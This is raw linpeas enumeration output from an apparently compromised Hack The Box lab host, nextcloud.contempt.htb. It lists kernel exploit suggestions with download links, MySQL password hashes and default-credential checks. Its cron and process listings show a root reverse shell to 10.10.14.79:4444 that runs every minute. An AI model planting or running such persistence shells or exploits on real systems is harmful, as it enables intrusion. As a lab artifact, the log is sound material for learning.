╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.14.0-162.22.2.el9_1.x86_64 (mockbuild@host-100-100-224-52) (gcc (GCC) 11.3.1 20220421 (Red Hat 11.3.1-2.1.0.2), GNU ld version 2.35.2-24.0.1.el9) #1 SMP PREEMPT_DYNAMIC Mon Mar 27 11:24:05 PDT 2023
User & Groups: uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Hostname: nextcloud.contempt.htb
Writable folder: /dev/shm
[+] /usr/sbin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)



Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.14.0-162.22.2.el9_1.x86_64 (mockbuild@host-100-100-224-52) (gcc (GCC) 11.3.1 20220421 (Red Hat 11.3.1-2.1.0.2), GNU ld version 2.35.2-24.0.1.el9) #1 SMP PREEMPT_DYNAMIC Mon Mar 27 11:24:05 PDT 2023
lsb_release Not Found

╔══════════╣ Sudo version
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.9.5p2


╔══════════╣ PATH
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses

╔══════════╣ Date & uptime
Tue Jul 18 13:38:50 EDT 2023
13:38:50 up 3 min, 1 user, load average: 0.39, 0.29, 0.13

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2

╔══════════╣ Unmounted file-system?
Check if you can mount umounted devices

UUID=aa9d97ef-9866-4d11-9a03-ee042b07c262 / xfs defaults 0 0
UUID=f823bc19-55f9-47bb-811e-3e9028fd8f56 none swap defaults 0 0

╔══════════╣ Environment
Any private information inside environment variables?
SHELL=/bin/bash
HISTCONTROL=ignoredups
HOSTNAME=nextcloud.contempt.htb
HISTSIZE=0
SSH_AUTH_SOCK=/tmp/ssh-XXXX2n9zBn/agent.1026
PWD=/root
LOGNAME=root
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/root
LANG=C.UTF-8
HISTFILE=/dev/null
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:
SSH_CONNECTION=172.16.20.1 60226 172.16.20.20 22
XDG_SESSION_CLASS=user
SELINUX_ROLE_REQUESTED=
TERM=xterm-256color
LESSOPEN=||/usr/bin/lesspipe.sh %s
USER=root
SELINUX_USE_CURRENT_RANGE=
SHLVL=2
XDG_SESSION_ID=8
XDG_RUNTIME_DIR=/run/user/0
SSH_CLIENT=172.16.20.1 60226 22
DEBUGINFOD_URLS=https://debuginfod.centos.org/
which_declare=declare -f
PATH=/root/.local/bin:/root/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SELINUX_LEVEL_REQUESTED=
HISTFILESIZE=0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/0/bus
MAIL=/var/spool/mail/root
SSH_TTY=/dev/pts/1
OLDPWD=/opt
BASH_FUNC_which%%=() { ( alias;
eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot $@
}
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-0847] DirtyPipe

Details: https://dirtypipe.cm4all.com/
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-3156] sudo Baron Samedit

Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded


╔══════════╣ Executing Linux Exploit Suggester 2
https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: targeted
Current mode: permissive
Mode from config file: permissive
Policy MLS status: enabled
Policy deny_unknown status: allowed
Memory protection checking: actual (secure)
Max kernel policy version: 33
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (microsoft)

╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No



╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root 1 0.5 1.7 106352 15664 ? Ss 13:35 0:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
root 459 0.0 1.0 96176 9440 ? Ss 13:35 0:00 /usr/lib/systemd/systemd-journald
root 474 0.0 1.3 34432 12588 ? Ss 13:35 0:00 /usr/lib/systemd/systemd-udevd
root 488 0.0 0.2 18144 2328 ? S/sbin/auditd
root 538 0.0 2.0 254508 18540 ? Ssl 13:35 0:00 /usr/sbin/NetworkManager --no-daemon[0m
root 542 0.0 0.2 3552 2060 ? Ss 13:35 0:00 /usr/sbin/hypervkvpd -n
root 543 0.0 0.1 2636 960 ? Ss 13:35 0:00 /usr/sbin/hypervvssd -n
root 544 0.0 1.3 158460 12092 ? Ssl 13:35 0:00 /usr/sbin/rsyslogd -n
root 546 0.0 1.2 20404 11116 ? Ss 13:35 0:00 /usr/lib/systemd/systemd-logind
dbus 551 0.0 0.5 10760 4644 ? Ss 13:35 0:00 /usr/bin/dbus-broker-launch --scope system --audit
dbus 557 0.0 0.2 4996 2620 ? S 13:35 0:00 _ dbus-broker --log 4 --controller 9 --machine-id bcdf7c70eb974d48881c9091f1d3f4ed --max-bytes 536870912 --max-fds 4096 --max-matches 131072 --audit
└─(Caps) 0x0000000020000000=cap_audit_write
chrony 556 0.0 0.3 84436 3240 ? S 13:35 0:00 /usr/sbin/chronyd -F 2
└─(Caps) 0x0000000002000400=cap_net_bind_service,cap_sys_time
root 562 0.0 1.7 22380 15400 ? Ss 13:35 0:00 /usr/sbin/httpd -DFOREGROUND
apache 757 0.0 0.9 23660 8096 ? S 13:36 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 759 0.0 1.3 1081468 11696 ? Sl 13:36 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 760 0.0 1.5 1212604 13744 ? Sl 13:36 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 761 0.0 1.7 1081468 15556 ? Sl 13:36 0:00 _ /usr/sbin/httpd -DFOREGROUND
apache 1038 0.0 1.3 1081468 11696 ? Sl 13:37 0:00 _ /usr/sbin/httpd -DFOREGROUND
root 564 0.0 3.5 252968 31676 ? Ss 13:35 0:00 php-fpm: master process (/etc/php-fpm.conf)
apache 666 0.0 1.5 254752 13652 ? S 13:35 0:00 _ php-fpm: pool www
apache 667 0.0 1.5 254752 13652 ? S 13:35 0:00 _ php-fpm: pool www
apache 668 0.0 1.5 254752 13652 ? S 13:35 0:00 _ php-fpm: pool www
apache 669 0.0 1.5 254752 13652 ? S 13:35 0:00 _ php-fpm: pool www
apache 670 0.1 5.0 259804 45008 ? S 13:35 0:00 _ php-fpm: pool www
root 1026 0.0 0.7 18788 6404 ? S 13:37 0:00 _ sshd: root@pts/1
root 1027 0.0 0.4 5016 4024 pts/1 Ss 13:37 0:00 _ -bash
root 1145 0.0 0.6 6668 5612 pts/1 S+ 13:38 0:00 _ /bin/sh /tmp/linpeas.sh
root 4153 0.0 0.4 6668 3880 pts/1 S+ 13:39 0:00 _ /bin/sh /tmp/linpeas.sh
root 4157 0.0 0.3 7776 3316 pts/1 R+ 13:39 0:00 | _ ps fauxwww
root 4156 0.0 0.2 6668 2484 pts/1 S+ 13:39 0:00 _ /bin/sh /tmp/linpeas.sh
root 568 0.0 0.3 6080 3544 ? Ss 13:35 0:00 /usr/sbin/crond -n
root 712 0.0 0.7 13520 6424 ? S 13:36 0:00 _ /usr/sbin/CROND -n
root 735 0.0 0.3 4596 3164 ? Ss 13:36 0:00 _ /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1
root 736 0.0 0.4 4888 4004 ? S 13:36 0:00 _ /bin/bash -i
root 973 0.0 0.2 4888 2184 ? S 13:36 0:00 _ /bin/bash -i
root 974 0.0 0.0 4888 656 ? S 13:36 0:00 _ /bin/bash -i
root 975 0.0 0.2 4888 2252 ? S 13:36 0:00 _ /bin/bash -i
root 976 0.0 0.7 9516 7000 ? S 13:36 0:00 _ python3 -c import pty;pty.spawn("/bin/bash")
root 977 0.0 0.4 5004 4152 pts/0 Ss+ 13:36 0:00 _ /bin/bash
root 569 0.0 0.1 3044 1084 tty1 Ss+ 13:35 0:00 /sbin/agetty -o -p -- u --noclear - linux
mysql 660 0.0 11.5 1093468 103648 ? Ssl 13:35 0:00 /usr/libexec/mariadbd --basedir=/usr
root 717 0.0 1.5 22248 13536 ? Ss 13:36 0:00 /usr/lib/systemd/systemd --user
root 722 0.0 0.5 25612 5212 ? S 13:36 0:00 _ (sd-pam)
apache 4079 0.6 1.4 22200 13440 ? Ss 13:39 0:00 /usr/lib/systemd/systemd --user
apache 4081 0.0 0.5 107540 5324 ? S 13:39 0:00 _ (sd-pam)

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Processes whose PPID belongs to a different user (not root)
You will know if a user can somehow spawn processes as a different user
Proc 551 with ppid 1 is run by user dbus but the ppid user is root
Proc 556 with ppid 1 is run by user chrony but the ppid user is root
Proc 660 with ppid 1 is run by user mysql but the ppid user is root
Proc 666 with ppid 564 is run by user apache but the ppid user is root
Proc 667 with ppid 564 is run by user apache but the ppid user is root
Proc 668 with ppid 564 is run by user apache but the ppid user is root
Proc 669 with ppid 564 is run by user apache but the ppid user is root
Proc 670 with ppid 564 is run by user apache but the ppid user is root
Proc 757 with ppid 562 is run by user apache but the ppid user is root
Proc 759 with ppid 562 is run by user apache but the ppid user is root
Proc 760 with ppid 562 is run by user apache but the ppid user is root
Proc 761 with ppid 562 is run by user apache but the ppid user is root
Proc 1038 with ppid 562 is run by user apache but the ppid user is root
Proc 4079 with ppid 1 is run by user apache but the ppid user is root

╔══════════╣ Processes with credentials in memory (root req)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1'
incrontab Not Found
-rw-r--r--. 1 root root 0 Oct 31 2022 /etc/cron.deny
-rw-r--r--. 1 root root 451 May 11 2022 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x. 2 root root 21 May 16 13:01 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..
-rw-r--r--. 1 root root 128 Oct 31 2022 0hourly

/etc/cron.daily:
total 12
drwxr-xr-x. 2 root root 6 May 11 2022 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..

/etc/cron.hourly:
total 16
drwxr-xr-x. 2 root root 22 May 11 2022 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..
-rwxr-xr-x. 1 root root 610 Oct 31 2022 0anacron

/etc/cron.monthly:
total 12
drwxr-xr-x. 2 root root 6 May 11 2022 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..

/etc/cron.weekly:
total 12
drwxr-xr-x. 2 root root 6 May 11 2022 .
drwxr-xr-x. 88 root root 8192 Jul 18 13:35 ..

/var/spool/anacron:
total 12
drwxr-xr-x. 2 root root 63 May 16 13:01 .
drwxr-xr-x. 6 root root 56 May 16 13:01 ..
-rw-------. 1 root root 9 Jul 18 07:31 cron.daily
-rw-------. 1 root root 9 Jul 18 08:11 cron.monthly
-rw-------. 1 root root 9 Jul 18 07:51 cron.weekly
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root





SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
RANDOM_DELAY=45
START_HOURS_RANGE=3-22

1 5 cron.daily nice run-parts /etc/cron.daily
7 25 cron.weekly nice run-parts /etc/cron.weekly
@monthly 45 cron.monthly nice run-parts /etc/cron.monthly
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.79/4444 0>&1'

╔══════════╣ Systemd PATH
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

╔══════════╣ Analyzing .service files
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services

╔══════════╣ System timers
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2023-07-18 13:45:21 EDT 6min left - - dnf-makecache.timer dnf-makecache.service
Tue 2023-07-18 13:50:13 EDT 11min left - - systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Wed 2023-07-19 00:00:00 EDT 10h left Tue 2023-07-18 06:14:37 EDT 7h ago logrotate.timer logrotate.service

╔══════════╣ Analyzing .timer files
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ D-Bus config files
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus

╔══════════╣ D-Bus Service Objects list
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 546 systemd-logind root :1.0 systemd-logind.service - -
:1.1 1 systemd root :1.1 init.scope - -
:1.15 717 systemd root :1.15 [email protected] - -
:1.2 551 dbus-broker-lau root :1.2 dbus-broker.service - -
:1.3 538 NetworkManager root :1.3 NetworkManager.service - -
:1.37 4079 systemd apache :1.37 [email protected] - -
:1.40 6124 busctl root :1.40 session-8.scope 8 -
:1.6 538 NetworkManager root :1.6 NetworkManager.service - -
com.redhat.ifcfgrh1 538 NetworkManager root :1.6 NetworkManager.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.NetworkManager 538 NetworkManager root :1.3 NetworkManager.service - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 546 systemd-logind root :1.0 systemd-logind.service - -
org.freedesktop.nm_dispatcher - - - (activatable) - - -
org.freedesktop.nm_priv_helper - - - (activatable) - - -
org.freedesktop.systemd1 1 systemd root :1.1 init.scope - -
org.freedesktop.timedate1 - - - (activatable) - - -


╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
nextcloud.contempt.htb
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
172.16.20.1 adfs.contempt.htb mail.contempt.htb dc01.contempt.htb
search contempt.htb
nameserver 172.16.20.1
contempt.htb

╔══════════╣ Interfaces
default 0.0.0.0
loopback 127.0.0.0
link-local 169.254.0.0
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:15:5d:20:b5:01 brd ff:ff:ff:ff:ff:ff
inet 172.16.20.20/24 brd 172.16.20.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet6 fe80::215:5dff:fe20:b501/64 scope link noprefixroute
valid_lft forever preferred_lft forever

╔══════════╣ Active Ports
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=565,fd=3))
tcp LISTEN 0 511 *:80 *:* users:(("httpd",pid=1038,fd=4),("httpd",pid=761,fd=4),("httpd",pid=760,fd=4),("httpd",pid=759,fd=4),("httpd",pid=562,fd=4))
tcp LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=565,fd=4))
tcp LISTEN 0 511 *:443 *:* users:(("httpd",pid=1038,fd=6),("httpd",pid=761,fd=6),("httpd",pid=760,fd=6),("httpd",pid=759,fd=6),("httpd",pid=562,fd=6))
tcp LISTEN 0 80 *:3306 *:* users:(("mariadbd",pid=660,fd=25))

╔══════════╣ Can I sniff with tcpdump?
No



╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for root on nextcloud:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User root may run the following commands on nextcloud:
(ALL) ALL
/etc/sudoers:Defaults !visiblepw
/etc/sudoers:Defaults always_set_home
/etc/sudoers:Defaults match_group_by_gid
/etc/sudoers:Defaults always_query_group_plugin
/etc/sudoers:Defaults env_reset
/etc/sudoers:Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS"
/etc/sudoers:Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"
/etc/sudoers:Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"
/etc/sudoers:Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"
/etc/sudoers:Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"
/etc/sudoers:Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin
/etc/sudoers:root ALL=(ALL) ALL
/etc/sudoers:%wheel ALL=(ALL) ALL

╔══════════╣ Checking sudo tokens
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused

╔══════════╣ Checking Pkexec policy
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
echo.rivers:x:1000:1000::/home/echo.rivers:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=1000(echo.rivers) gid=1000(echo.rivers) groups=1000(echo.rivers)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=2(daemon[0m) gid=2(daemon[0m) groups=2(daemon[0m)
uid=27(mysql) gid=27(mysql) groups=27(mysql)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=5(sync) gid=0(root) groups=0(root)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=7(halt) gid=0(root) groups=0(root)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=991(nginx) gid=991(nginx) groups=991(nginx)
uid=992(systemd-oom) gid=992(systemd-oom) groups=992(systemd-oom)
uid=997(chrony) gid=994(chrony) groups=994(chrony)
uid=998(sssd) gid=995(sssd) groups=995(sssd)
uid=999(systemd-coredump) gid=996(systemd-coredump) groups=996(systemd-coredump)

╔══════════╣ Login now
13:39:09 up 3 min, 1 user, load average: 0.55, 0.34, 0.15
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 13:37 37.00s 0.05s 0.00s w

╔══════════╣ Last logons
reboot system boot Fri Jun 9 16:30:07 2023 - Fri Jun 9 16:34:19 2023 (00:04) 0.0.0.0
root pts/0 Fri Jun 9 16:18:54 2023 - Fri Jun 9 16:25:36 2023 (00:06) 172.16.20.1
reboot system boot Fri Jun 9 16:16:32 2023 - Fri Jun 9 16:28:06 2023 (00:11) 0.0.0.0
reboot system boot Thu May 25 14:51:29 2023 - Thu May 25 16:34:42 2023 (01:43) 0.0.0.0
root pts/0 Thu May 25 14:46:28 2023 - Thu May 25 14:47:51 2023 (00:01) 172.16.20.1
root pts/0 Thu May 25 13:47:24 2023 - Thu May 25 13:53:40 2023 (00:06) 172.16.20.1
reboot system boot Thu May 25 13:23:46 2023 - Thu May 25 14:49:54 2023 (01:26) 0.0.0.0
reboot system boot Thu May 25 08:48:23 2023 - Thu May 25 08:48:59 2023 (00:00) 0.0.0.0

wtmp begins Thu May 25 08:46:42 2023

╔══════════╣ Last time logon each user
Username Port From Latest
root pts/1 172.16.20.1 Tue Jul 18 13:37:56 -0400 2023
echo.rivers pts/0 Sat Jul 15 10:23:40 -0400 2023

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/usr/sbin/ping
/usr/bin/python
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
gcc.x86_64 11.3.1-4.3.el9 @appstream
gcc-c++.x86_64 11.3.1-4.3.el9 @appstream
/usr/bin/gcc
/usr/bin/g++

╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.5.16-MariaDB, for Linux (x86_64) using EditLine wrapper


═╣ MySQL connection using default root/root ........... Yes
User Host authentication_string
mariadb.sys localhost
root localhost *8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14
mysql localhost invalid
nextcloud localhost *43A3A08588FD297EFFE89D2C4F108FDFA67C6325
═╣ MySQL connection using root/toor ................... Yes
User Host authentication_string
mariadb.sys localhost
root localhost *8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14
mysql localhost invalid
nextcloud localhost *43A3A08588FD297EFFE89D2C4F108FDFA67C6325
═╣ MySQL connection using root/NOPASS ................. Yes
User Host authentication_string
mariadb.sys localhost
root localhost *8C0A3FBC12B2E2353C9FC2AD10587C3F56D1AA14
mysql localhost invalid
nextcloud localhost *43A3A08588FD297EFFE89D2C4F108FDFA67C6325

╔══════════╣ Searching mysql credentials and exec
